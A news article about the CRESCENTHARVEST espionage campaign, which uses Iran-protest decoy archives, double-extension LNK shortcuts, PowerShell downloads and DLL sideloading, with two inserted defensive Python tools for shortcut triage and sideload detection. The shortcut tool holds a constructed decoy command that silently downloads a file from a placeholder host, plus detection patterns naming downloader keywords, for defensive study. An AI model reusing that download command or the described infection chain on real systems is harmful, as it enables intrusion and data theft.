CRESCENTHARVEST exploits the protests in Iran to spy and steal data


Cybersecurity researchers have identified a targeted campaign that takes advantage of the outrage over, and the search for information about, the protests in Iran to distribute malware. The firm Acronis tracks this operation under the name CRESCENTHARVEST and has observed it since January 9; according to its analysis, the attackers set out to install a remote-access trojan (RAT) and a dedicated information-stealing component able to execute remote commands, log keystrokes and extract sensitive data.

The decoy used by the operators is designed to convince Farsi speakers: a RAR archive that appears to contain photographs and videos of the demonstrations, accompanied by a Persian-language report that supposedly offers updates from "rebel cities." Inside are Windows shortcuts with a double extension - for example "imagen.jpg.lnk" or "video.mp4.lnk" - a classic trick that makes the system display what looks like a media file while the file actually runs code. Opening one of those shortcuts launches a PowerShell script that downloads a second compressed archive and, so as not to raise suspicion, simultaneously opens a legitimate image or video as a decoy.
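The shortcut trick described above can be triaged offline before anyone double-clicks. The following is an added example (not code from Acronis or from the article) that parses the Windows shell link format according to Microsoft's MS-SHLLINK layout and flags the signals named in the text: a double extension that imitates a media file, a script interpreter as the target, a hidden launch, and a command line that downloads or evaluates further code. The heuristics, the regular expressions and the two sample shortcuts are constructed for the example; the decoy sample uses a placeholder URL and is not a real artefact from the campaign.

```python
"""Triage Windows shortcut (.lnk) files for the decoy pattern described above:
a double extension that imitates a media file plus a PowerShell launcher.
Added example, not code from Acronis or the article; the byte layout follows
Microsoft's MS-SHLLINK specification, the heuristics and samples are constructed."""
import re
import struct

HEADER_SIZE = 0x4C
LNK_CLSID = b"\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData blocks appear in this order, each only if its LinkFlags bit is set.
STRING_FIELDS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location"))
MEDIA_EXTS = {"jpg", "jpeg", "png", "gif", "mp4", "avi", "mov", "mkv", "pdf"}
INTERPRETERS = re.compile(r"(powershell|pwsh|cmd|wscript|cscript|mshta)(\.exe)?\b")
HIDDEN = re.compile(r"-w(in|indowstyle)?\s+hidden|-nop\b|-noni\b|-ep\s+bypass", re.I)
STAGER = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|"
                    r"start-bitstransfer|invoke-expression|\biex\b|-e(nc|ncodedcommand)?\s", re.I)


def parse_lnk(data: bytes) -> dict:
    """Decode the ShellLinkHeader and StringData of a .lnk into a dict."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a shell link: bad HeaderSize")
    flags = struct.unpack_from("<I", data, 20)[0]
    fields = {"show_command": struct.unpack_from("<I", data, 60)[0]}
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip the IDList (IDListSize + 2 bytes)
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                    # skip LinkInfo (its size field includes itself)
        off += struct.unpack_from("<I", data, off)[0]
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]   # CountCharacters, not bytes
        off += 2
        if flags & IS_UNICODE:
            fields[name] = data[off:off + 2 * count].decode("utf-16-le", "replace")
            off += 2 * count
        else:
            fields[name] = data[off:off + count].decode("cp1252", "replace")
            off += count
    return fields


def triage(filename: str, data: bytes) -> list:
    """Return the reasons a shortcut looks like a decoy; an empty list means nothing flagged."""
    reasons = []
    parts = filename.lower().rsplit(".", 2)
    if len(parts) == 3 and parts[2] == "lnk" and parts[1] in MEDIA_EXTS:
        reasons.append(f"double extension: poses as .{parts[1]}")
    f = parse_lnk(data)
    launch = " ".join(f.get(k, "") for k in ("relative_path", "working_dir", "arguments"))
    if INTERPRETERS.search(launch.lower()):
        reasons.append("target is a script interpreter")
    if HIDDEN.search(launch) or f["show_command"] == 7:  # 7 = SW_SHOWMINNOACTIVE
        reasons.append("launched hidden/minimized")
    if STAGER.search(launch):
        reasons.append("command line downloads or evaluates further code")
    return reasons


def build_lnk(relative_path: str, arguments: str = "", show_command: int = 1) -> bytes:
    """Build a minimal Unicode shell link (constructed test input, not a real sample)."""
    flags = IS_UNICODE | 0x08 | (0x20 if arguments else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b""
    for s in (relative_path, arguments) if arguments else (relative_path,):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


# Constructed samples: one modelled on the decoy described in the article
# (placeholder URL, not a real indicator), one ordinary benign shortcut.
DECOY_NAME = "image.jpg.lnk"
DECOY_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r'-w hidden -nop -c "iwr http://example.invalid/s2.zip -OutFile $env:TEMP\s2.zip; start $env:TEMP\image.jpg"',
    show_command=7)
BENIGN_NAME = "notes.lnk"
BENIGN_LNK = build_lnk(r"..\..\Documents\notes.txt")

if __name__ == "__main__":
    for name, blob in ((DECOY_NAME, DECOY_LNK), (BENIGN_NAME, BENIGN_LNK)):
        print(name, "->", triage(name, blob) or "clean")
```

`triage` works on real shortcuts as well, because `parse_lnk` honours the LinkFlags bits and skips the IDList and LinkInfo sections when they are present; only the StringData fields are needed to see what the shortcut launches. Run it over every `.lnk` extracted from an archive before anything in it is opened.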


The secondary ZIP contains a troubling combination: a Google-signed binary that belongs to the Chrome cleanup utility, plus several DLL libraries. By abusing the Windows DLL search order, the attackers cause the legitimate executable to load malicious DLLs, a technique known as "DLL sideloading." One of these libraries is a C++ component that extracts encryption keys associated with Chrome, while another - identified by the researchers as the CRESCENTHARVEST implant - implements the espionage and remote-control functions.

The observed capabilities of this implant include enumerating installed security products, listing local accounts, loading additional modules, collecting system metadata, extracting browser credentials, exfiltrating session data from the desktop version of Telegram, and keylogging. To communicate with its command-and-control servers, CRESCENTHARVEST uses the Windows WinHTTP API and points to a domain that, according to Acronis, serves to blend its traffic with legitimate communication.

The attack pattern is not new, but it is effective: exploit current events to attract victims, use misleading shortcuts as the initial vector, and abuse signed, legitimate binaries to evade security controls. Acronis notes that, although it has not conclusively attributed the operation, the campaign is consistent with the historical tactics of Iran-aligned groups, which have resorted to long-term social engineering and false identities to gain the trust of their targets - a practice documented by agencies and cybersecurity centres as part of persistent-threat activity. For context on this kind of manoeuvre, the Canadian Cybersecurity Agency's guidance on targeted and spear-phishing campaigns, issued by the Government of Canada, is available.

This finding comes shortly after other analyses that also documented attempts to target activists, journalists and non-governmental organisations involved in reporting abuses in Iran. Outside security companies have reported campaigns with similar objectives and methods, indicating that social and journalistic movements around a real conflict become fertile ground for targeted cyber-espionage operations.

From a technical point of view, the campaign uses well-known vectors that become dangerous in combination: shortcut (LNK) files to deceive the user; the silent download of additional artefacts via PowerShell; a binary signed by a legitimate vendor to load malicious libraries; and finally a component that extracts credentials and data from common applications. Microsoft's official documentation explains how Windows resolves the loading of dynamic-link libraries and why sideloading can be exploited in these scenarios, useful material for IT managers and security teams.

For the people and groups who cover or follow events in Iran, the risk is twofold: on the one hand, the urge to quickly open material that appears relevant is strong; on the other, seemingly innocent files can hide persistence and exfiltration tools. Legitimate browser tools, such as the Chrome cleanup utility whose signature was abused in this campaign, can be turned into part of the malicious loading chain; Google explains the purpose of that component on its support page about Chrome's cleanup tool.


What can those who consider themselves at risk do? Beyond keeping systems and software up to date, it is wise to avoid opening compressed files or links of doubtful origin, to distrust shortcuts that show a double extension, and not to enable script execution without verifying the source. At the organisational level, monitoring outbound traffic, monitoring the execution of unknown binaries, and applying policies that restrict DLL loading from untrusted locations all help reduce the attack surface. For practical recommendations on detecting and mitigating phishing and spear-phishing campaigns, the United States Cybersecurity and Infrastructure Security Agency (CISA / US-CERT) maintains useful and accessible material.
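The sideloading mechanism described earlier (a signed vendor binary loading planted DLLs from the folder the archive was extracted to) and the recommendation above to monitor unknown binaries and restrict DLL loading from untrusted locations both reduce to the same detection question: did a signed executable running from an unusual directory load a DLL from its own folder, and did that DLL carry a name Windows would normally resolve from a system directory? The following is an added example, not code from Acronis or the article, that runs those two rules over constructed image-load records; the record schema, signer names, paths and the stand-in "system DLL" catalogue are all assumptions made for the example.

```python
"""Detect the DLL-sideloading pattern described above from image-load telemetry:
a signed executable running outside the normal program directories pulls a DLL
from its own folder, and that DLL carries a name Windows would normally resolve
from a system directory. Added example, not code from Acronis or the article;
the event records, signer names and the "system DLL" catalogue are constructed."""
import ntpath

# Directories where a signed binary is expected to live; anything else (Temp,
# Downloads, an extracted archive) is where the decoy in this campaign unpacks.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def _dir(path: str) -> str:
    """Normalised directory of a Windows path, with a trailing backslash."""
    return ntpath.dirname(path).lower().rstrip("\\") + "\\"


def _trusted(path: str) -> bool:
    return _dir(path).startswith(TRUSTED_DIRS)


def detect_sideload(event: dict, system_dll_names: set) -> list:
    """Return the rules an image-load event trips; an empty list means no finding.

    event keys (constructed schema, loosely modelled on EDR image-load records):
      process_path, process_signer (None if unsigned), dll_path, dll_signer (None if unsigned)
    system_dll_names: lower-case basenames of DLLs that belong in a system directory.
    """
    findings = []
    proc, dll = event["process_path"], event["dll_path"]
    proc_signer, dll_signer = event.get("process_signer"), event.get("dll_signer")
    # Rule 1: a signed binary dropped somewhere unusual loads a DLL from the same
    # folder that is unsigned or signed by someone else: the "legitimate signed
    # EXE + planted DLL" combination the article describes.
    if proc_signer and not _trusted(proc) and _dir(proc) == _dir(dll) and dll_signer != proc_signer:
        findings.append("signed binary outside program directories loaded a DLL from its own folder "
                        f"(DLL signer: {dll_signer or 'unsigned'})")
    # Rule 2: search-order collision. The loader checks the application directory
    # before the system directories, so a planted file with a system DLL's name wins.
    name = ntpath.basename(dll).lower()
    if name in system_dll_names and not _trusted(dll):
        findings.append(f"{name} resolved from {_dir(dll)} instead of a system directory")
    return findings


def scan(events: list, system_dll_names: set) -> dict:
    """Map each process image to the findings raised by its DLL loads (clean processes omitted)."""
    report = {}
    for ev in events:
        hits = detect_sideload(ev, system_dll_names)
        if hits:
            report.setdefault(ev["process_path"], []).extend(hits)
    return report


# Constructed catalogue standing in for a real inventory of System32 DLL basenames.
SYSTEM_DLLS = {"helper.dll", "compat.dll"}

# Constructed events: the first two model the campaign (signed vendor EXE in an
# extracted archive loading planted DLLs); the last two are ordinary, benign loads.
EVENTS = [
    {"process_path": r"C:\Users\user\AppData\Local\Temp\protest_media\cleanup_tool.exe",
     "process_signer": "Example Vendor",
     "dll_path": r"C:\Users\user\AppData\Local\Temp\protest_media\helper.dll", "dll_signer": None},
    {"process_path": r"C:\Users\user\AppData\Local\Temp\protest_media\cleanup_tool.exe",
     "process_signer": "Example Vendor",
     "dll_path": r"C:\Users\user\AppData\Local\Temp\protest_media\core.dll", "dll_signer": None},
    {"process_path": r"C:\Program Files\Example\app.exe", "process_signer": "Example Vendor",
     "dll_path": r"C:\Program Files\Example\plugin.dll", "dll_signer": None},
    {"process_path": r"C:\Users\user\AppData\Local\Temp\protest_media\cleanup_tool.exe",
     "process_signer": "Example Vendor",
     "dll_path": r"C:\Windows\System32\helper.dll", "dll_signer": "Example OS Vendor"},
]

if __name__ == "__main__":
    for image, hits in scan(EVENTS, SYSTEM_DLLS).items():
        print(image)
        for h in hits:
            print("  -", h)
```

Rule 1 is the one that fires on this campaign's layout regardless of which DLL names are used, because it keys on where the signed binary runs from and on the signer mismatch rather than on a list of names; rule 2 needs a catalogue of system DLL basenames, which in practice is taken from a clean build of the organisation's standard image rather than hard-coded as here.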

The appearance of CRESCENTHARVEST reflects a troubling pattern: wherever there is conflict and social mobilisation, actors stand ready to exploit attention and solidarity for the benefit of espionage operations. Staying alert, verifying sources and adopting digital-hygiene practices is not only a technical recommendation but a personal and collective security measure for those who report on, document or take part in covering these events.

For the detailed technical analysis of this campaign, Acronis has published a report describing the infection flow and the observed samples on its Threat Research Unit blog.
